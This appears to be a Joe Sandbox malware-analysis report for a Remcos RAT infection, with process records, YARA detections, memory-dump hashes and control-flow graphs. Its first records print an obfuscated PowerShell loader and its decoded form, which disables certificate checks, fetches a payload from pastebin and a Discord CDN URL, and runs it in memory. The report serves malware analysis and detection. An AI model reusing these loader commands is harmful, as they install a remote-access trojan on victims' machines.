                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:13:53:05
                            Start date:10/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:13:53:06
                            Start date:10/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$lprkl = '0';$mhsfo = 'C:\Users\user\Desktop\envifa.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $zdmwh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($zdmwh).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&680d18e4f3bf6456c136a90d310d8712a85c58a3995f1ad6b9c915670d6dab1a=mh&f818d866=si&f03de866=xe?txt.7.9ivne/8345426616481030621/1624179062327335121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $mhsfo , '_____dgf_______________________________________-------', $lprkl, '1', 'Roda' ));"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:13:53:15
                            Start date:10/07/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                            Imagebase:0xc20000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3015953762.0000000002E0F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:high
                            Has exited:false

                            Reset < >
                              Memory Dump Source
                              • Source File: 00000001.00000002.1868015642.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                              • Instruction ID: 57527a6f62166d1b39b571920a0cef6bcf163646589e570ece9fb3c5b1259c8a
                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                              • Instruction Fuzzy Hash: 1D01A77020CB0D8FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1D632E882CB41

                              Execution Graph

                              Execution Coverage:3.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:100%
                              Total number of Nodes:6
                              Total number of Limit Nodes:0
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: N_H$!
                              • API String ID: 0-3136906785
                              • Opcode ID: 75a052334552ed27e640395741ee4f30e2c1500016f68d1b660ad053d76d0ea3
                              • Instruction ID: 69893533225ee1139f209e16bebdbd1359a349d0e8b6579a69e1e783356a9c4d
                              • Opcode Fuzzy Hash: 75a052334552ed27e640395741ee4f30e2c1500016f68d1b660ad053d76d0ea3
                              • Instruction Fuzzy Hash: 4CE25831B1EB9D1FE7A69B6858245B57FE2EF56214B0901FBD08DC71E3DA18AC06C341

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 368 7ffd9b8798d8-7ffd9b879a61 NtQueryInformationProcess 372 7ffd9b879a63 368->372 373 7ffd9b879a69-7ffd9b879ac1 368->373 372->373
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 82e4e68899f83b71595a6db0661021436f912faced44cfa56b06f12aad4288c5
                              • Instruction ID: 932955550e2cb0d17715bcbed272e03c45d209e3f2203347b71ffa5849884871
                              • Opcode Fuzzy Hash: 82e4e68899f83b71595a6db0661021436f912faced44cfa56b06f12aad4288c5
                              • Instruction Fuzzy Hash: 8761397090864C8FDB95DFA8C894BE9BBF1FB6A310F1081AAD44DE7252DB349985CB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 376 7ffd9b878891-7ffd9b878899 377 7ffd9b87889c-7ffd9b878997 CheckRemoteDebuggerPresent 376->377 378 7ffd9b87889b 376->378 383 7ffd9b87899f-7ffd9b878a0b 377->383 384 7ffd9b878999 377->384 378->377 384->383
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID: CheckDebuggerPresentRemote
                              • String ID:
                              • API String ID: 3662101638-0
                              • Opcode ID: 131b4be3e01b235f66b6c87b7279c12fbc41ceb969629e5a70cb0a0be6d486fa
                              • Instruction ID: bab7b25de7fe879af0d07db3a8c8f3049c0ba293905af88b436d26242755941c
                              • Opcode Fuzzy Hash: 131b4be3e01b235f66b6c87b7279c12fbc41ceb969629e5a70cb0a0be6d486fa
                              • Instruction Fuzzy Hash: D0514830D0864C8FDB58DFA8C885AEDBBF1EB59311F10816AD459E7252DB349586CF40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 412 7ffd9b940000-7ffd9b940038 414 7ffd9b940071-7ffd9b9400b8 412->414 415 7ffd9b94003a-7ffd9b940052 412->415 423 7ffd9b9400de-7ffd9b94015e 414->423 424 7ffd9b9400ba-7ffd9b9400db 414->424 415->414 429 7ffd9b940160-7ffd9b940179 423->429 430 7ffd9b940184-7ffd9b940219 423->430 429->430 436 7ffd9b94021f-7ffd9b940229 430->436 437 7ffd9b940466-7ffd9b94049e 430->437 438 7ffd9b940245-7ffd9b940252 436->438 439 7ffd9b94022b-7ffd9b940243 436->439 449 7ffd9b9404a0-7ffd9b9404c7 437->449 450 7ffd9b9404c9-7ffd9b9404e4 437->450 445 7ffd9b940403-7ffd9b94040d 438->445 446 7ffd9b940258-7ffd9b94025b 438->446 439->438 451 7ffd9b94040f-7ffd9b94041d 445->451 452 7ffd9b94041e-7ffd9b940463 445->452 446->445 448 7ffd9b940261-7ffd9b940269 446->448 448->437 453 7ffd9b94026f-7ffd9b940279 448->453 449->450 463 7ffd9b9404e8-7ffd9b9404f7 450->463 452->437 455 7ffd9b940292-7ffd9b940297 453->455 456 7ffd9b94027b-7ffd9b940290 453->456 455->445 461 7ffd9b94029d-7ffd9b9402a0 455->461 456->455 464 7ffd9b9402a2-7ffd9b9402b5 461->464 465 7ffd9b9402b7 461->465 467 7ffd9b9404fe-7ffd9b94050f 463->467 468 7ffd9b9404f9 463->468 466 7ffd9b9402b9-7ffd9b9402bb 464->466 465->466 466->445 472 7ffd9b9402c1-7ffd9b9402c9 466->472 474 7ffd9b940511 467->474 475 7ffd9b940516-7ffd9b940538 467->475 468->467 473 7ffd9b9404fb 468->473 476 7ffd9b9402cb-7ffd9b9402d5 472->476 477 7ffd9b9402d9 472->477 473->467 474->475 478 7ffd9b940513 474->478 475->463 479 7ffd9b94053a-7ffd9b9405ad 475->479 480 7ffd9b9402d7 476->480 481 7ffd9b9402f5-7ffd9b9402fb 476->481 483 7ffd9b9402de-7ffd9b9402f3 477->483 478->475 489 7ffd9b9405b3-7ffd9b9405bd 479->489 490 7ffd9b940721-7ffd9b94076c 479->490 480->483 485 7ffd9b9402fd-7ffd9b94030a 481->485 486 7ffd9b940317-7ffd9b940331 481->486 483->481 485->486 495 7ffd9b94030c-7ffd9b940315 485->495 486->477 492 7ffd9b940333-7ffd9b94033d 486->492 493 7ffd9b9405bf-7ffd9b9405d4 489->493 494 7ffd9b9405d6-7ffd9b9405e7 489->494 505 7ffd9b94076e-7ffd9b940772 490->505 506 7ffd9b940773-7ffd9b9407c7 490->506 499 7ffd9b94033f-7ffd9b940354 492->499 500 7ffd9b940356-7ffd9b9403b0 492->500 493->494 496 7ffd9b940601-7ffd9b940639 494->496 497 7ffd9b9405e9-7ffd9b9405ff 494->497 495->486 523 7ffd9b940655-7ffd9b94066a 496->523 524 7ffd9b94063b-7ffd9b940653 496->524 497->496 499->500 532 7ffd9b9403b2-7ffd9b9403c7 500->532 533 7ffd9b9403c9-7ffd9b9403d7 500->533 505->506 516 7ffd9b9407cd-7ffd9b9407d7 506->516 517 7ffd9b9408cc-7ffd9b940902 506->517 519 7ffd9b9407f3-7ffd9b940800 516->519 520 7ffd9b9407d9-7ffd9b9407f1 516->520 538 7ffd9b94092d-7ffd9b94095d 517->538 539 7ffd9b940904-7ffd9b94092b 517->539 535 7ffd9b94086d-7ffd9b940877 519->535 536 7ffd9b940802-7ffd9b940805 519->536 520->519 544 7ffd9b940686-7ffd9b9406dc 523->544 545 7ffd9b94066c-7ffd9b940684 523->545 524->523 532->533 554 7ffd9b9403f3-7ffd9b940402 533->554 555 7ffd9b9403d9-7ffd9b9403e6 533->555 541 7ffd9b940886-7ffd9b9408c9 535->541 542 7ffd9b940879-7ffd9b940885 535->542 536->535 537 7ffd9b940807-7ffd9b94080f 536->537 537->517 547 7ffd9b940815-7ffd9b94081f 537->547 568 7ffd9b940960-7ffd9b940971 538->568 569 7ffd9b94095f 538->569 539->538 541->517 581 7ffd9b9406e3-7ffd9b9406f3 544->581 545->544 552 7ffd9b940821-7ffd9b940831 547->552 553 7ffd9b940838-7ffd9b94083c 547->553 566 7ffd9b940867-7ffd9b94086c 552->566 553->535 561 7ffd9b94083e-7ffd9b940866 553->561 555->554 567 7ffd9b9403e8-7ffd9b9403f1 555->567 561->566 567->554 573 7ffd9b940974-7ffd9b9409a8 568->573 574 7ffd9b940973 568->574 569->568 574->573 582 7ffd9b9406fb-7ffd9b94071e 581->582 582->490
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 39d25a31e229fa07cb0599abe28d04aeb829b4fede1c83aff919b1eb498b3981
                              • Instruction ID: a91cd296902d324bdfd609c550318087e6a9269f26c069e7a75c308773554283
                              • Opcode Fuzzy Hash: 39d25a31e229fa07cb0599abe28d04aeb829b4fede1c83aff919b1eb498b3981
                              • Instruction Fuzzy Hash: EC721521A1EBDA1FE7669B7858755747FE2EF56610B0901FFD088CB1E3E918AC06C342

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf41e3d9ab4c4b92132a3afaf42d13990bdfc55456d25d72539f4ce85bb016c1
                              • Instruction ID: 0aed897beeafa1854b6e97e73905aebce33deb80db71048c795cfc78b6cf1a40
                              • Opcode Fuzzy Hash: cf41e3d9ab4c4b92132a3afaf42d13990bdfc55456d25d72539f4ce85bb016c1
                              • Instruction Fuzzy Hash: EC51482172EB891FE369976C98659357BD2EF95710B1402FFE449C72E3ED14EC028382

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00fa55de9664b21475309ce35017a21772a4f8ce451f656bb6d769520a8217e9
                              • Instruction ID: 6c23ca098a97d9bb250dbfce72cb6c7886a90b2321f071950a6215f84f6525fe
                              • Opcode Fuzzy Hash: 00fa55de9664b21475309ce35017a21772a4f8ce451f656bb6d769520a8217e9
                              • Instruction Fuzzy Hash: C9512822B2FABA1FFBB9966C14716B46BC2DF56754B1900BEC45DC31E3DD08AD008341
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d385918f9520fad9ca43c105cfe1031ca6436989f3f46fc0142a86fbe9d5239e
                              • Instruction ID: 9ef2ec9bcbdd23e98b30e8823976c0be54857b154efe4dbb78bfd6af1966a5fc
                              • Opcode Fuzzy Hash: d385918f9520fad9ca43c105cfe1031ca6436989f3f46fc0142a86fbe9d5239e
                              • Instruction Fuzzy Hash: 28410521A2FBAE1FE77646B808741B03FD2DF56608B0A01FBD48CC70E3E9585D0A8342
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 205fc9f2a3e982a77ad7ae3f2de27fefad25f45a9e2ff155936ec77fa33fc036
                              • Instruction ID: e5b3085494d227bb3986061eeb28374767b857cf70d5baec8f4332fcf4c8e6e1
                              • Opcode Fuzzy Hash: 205fc9f2a3e982a77ad7ae3f2de27fefad25f45a9e2ff155936ec77fa33fc036
                              • Instruction Fuzzy Hash: F941E412F2FABB1BF7B992A814752B46BC3EF95269B5A00BAD45EC31F3DD0899014301

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1441 7ffd9b94104a-7ffd9b941056 1443 7ffd9b94105c-7ffd9b941093 1441->1443 1444 7ffd9b94115a-7ffd9b941164 1441->1444 1454 7ffd9b9410b7 1443->1454 1455 7ffd9b941095-7ffd9b9410b5 1443->1455 1446 7ffd9b941173-7ffd9b9411b6 1444->1446 1447 7ffd9b941166-7ffd9b941172 1444->1447 1456 7ffd9b9410b9-7ffd9b9410bb 1454->1456 1455->1456 1456->1444 1457 7ffd9b9410c1-7ffd9b9410c4 1456->1457 1457->1444 1459 7ffd9b9410ca-7ffd9b941104 1457->1459 1465 7ffd9b941120-7ffd9b941123 1459->1465 1466 7ffd9b941106-7ffd9b94111e 1459->1466 1468 7ffd9b94112a-7ffd9b941133 1465->1468 1466->1465 1469 7ffd9b941135-7ffd9b941142 1468->1469 1470 7ffd9b94114c-7ffd9b941159 1468->1470 1469->1470 1473 7ffd9b941144-7ffd9b94114a 1469->1473 1473->1470
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 648ea8c4924b0dd87aa0ef33111677d6a7a88cfd21bac091d677fee49985c2dc
                              • Instruction ID: ead67383d4d2c974a9b7577c30519e901779b5cf4677eac27d04a3063b1ac947
                              • Opcode Fuzzy Hash: 648ea8c4924b0dd87aa0ef33111677d6a7a88cfd21bac091d677fee49985c2dc
                              • Instruction Fuzzy Hash: 7131A122B2FAFA1BF7B992A814B62B86BC2DF56359B1900BAD45DC32E7DD085C044341

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1475 7ffd9b944a05-7ffd9b944a21 1476 7ffd9b944a23-7ffd9b944a83 1475->1476 1477 7ffd9b9449b8-7ffd9b9449df 1475->1477 1484 7ffd9b944a85 1476->1484 1485 7ffd9b944a8a-7ffd9b944aaa 1476->1485 1481 7ffd9b9449e1 1477->1481 1482 7ffd9b9449e6-7ffd9b9449ee 1477->1482 1481->1482 1486 7ffd9b9449f5-7ffd9b944a02 1482->1486 1484->1485
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 88374b5905899a9ecf21fecfd82ad5923144ee6ff212bfdd2f5d79237bd02aab
                              • Instruction ID: 0b77327ee5920dd3cc94e3a7ad3f9800fac437876b17a6f0c07f810aa29fd845
                              • Opcode Fuzzy Hash: 88374b5905899a9ecf21fecfd82ad5923144ee6ff212bfdd2f5d79237bd02aab
                              • Instruction Fuzzy Hash: 1C31903191EBCD5FDB52DF6888696A97FB0FF1A204F0601EBD448C71A2DA349584C742

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1574 7ffd9b944959-7ffd9b9449df 1578 7ffd9b9449e1 1574->1578 1579 7ffd9b9449e6-7ffd9b9449ee 1574->1579 1578->1579 1580 7ffd9b9449f5-7ffd9b944a02 1579->1580
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4b053fdbabc43bdc1527af52bbcc3ae0eef9d54330a7aa9ced30a41af62454de
                              • Instruction ID: 5585bc9ec6cf524bb232dbbd269a838c889ba5f0c387bc8a5b83db31f9535c7a
                              • Opcode Fuzzy Hash: 4b053fdbabc43bdc1527af52bbcc3ae0eef9d54330a7aa9ced30a41af62454de
                              • Instruction Fuzzy Hash: 98117F3190F7D95FEB578F3448656993FB0EF16240B0A01EBC484CB1E3DE689999C352
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bc5b0e56b6c92260a3ff2934601586279342a761905d5881d8b84cf6576183a5
                              • Instruction ID: c3a0b411de7e55fcd69949fb769523ebbb483786cfdd57e1c871571a45daacfa
                              • Opcode Fuzzy Hash: bc5b0e56b6c92260a3ff2934601586279342a761905d5881d8b84cf6576183a5
                              • Instruction Fuzzy Hash: 8F215E7150E7C95FDB92DF288865A993FF0FF26300F0941EBD488CB1A3DA24A945C752
                              Memory Dump Source
                              • Source File: 00000003.00000002.1850439654.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4083ebdff289fec048a7143dea32ea989877940303a6b13c3baf873d29c9d669
                              • Instruction ID: 4af852e34bde985bc103694ea208368f6c3bc97df6daff270009690108179b83
                              • Opcode Fuzzy Hash: 4083ebdff289fec048a7143dea32ea989877940303a6b13c3baf873d29c9d669
                              • Instruction Fuzzy Hash: F711BE2194E7D95FDB929F28886829A7FA0FF16300F0A01EBD888CB1E3DA246555C351
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 56524d518941b7f0a766e084a849d92d9eeccb126e17719564df0dc8ba60867b
                              • Instruction ID: 97b3379cece16410e489123d05dab0eb8249c051af247767171ad443db0af7cc
                              • Opcode Fuzzy Hash: 56524d518941b7f0a766e084a849d92d9eeccb126e17719564df0dc8ba60867b
                              • Instruction Fuzzy Hash: 1C719570908A8D8FDBA8DF58C855BF97BE0FF59310F10416AE84DC72A1DB749985CB81
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 55f22e59c5c1c0027d1e8ecda94c7b6c4c076289bca017ffcd8c26840d8f9090
                              • Instruction ID: 104b8ffb39d9c5e865461a076af9d4a5d47c5df5188bf1fef2f998959f08a39c
                              • Opcode Fuzzy Hash: 55f22e59c5c1c0027d1e8ecda94c7b6c4c076289bca017ffcd8c26840d8f9090
                              • Instruction Fuzzy Hash: 8C11A37094E2869FD712CFA0C864AE9BFF0EF4B314F0942EAD044C71A2D67C5A49E751
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5ae2614adc246a90e33bc36194af418e0d97d76560b493c8cf209ae6de6634ba
                              • Instruction ID: df3bccbfb9a747a35a45637f2c76dc4fe829d3795bf47bd54429ff22f1c99fea
                              • Opcode Fuzzy Hash: 5ae2614adc246a90e33bc36194af418e0d97d76560b493c8cf209ae6de6634ba
                              • Instruction Fuzzy Hash: 7301A230E4E28E8FEB229F60C8646ED77B1FB4A314F0541BAC015D71E2DA7CA608DB41
                              Memory Dump Source
                              • Source File: 00000003.00000002.1849854443.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a19520de18deffc78d9f90f02973abcd7e40ba1c72beea23ddbb147ee1c1fc0c
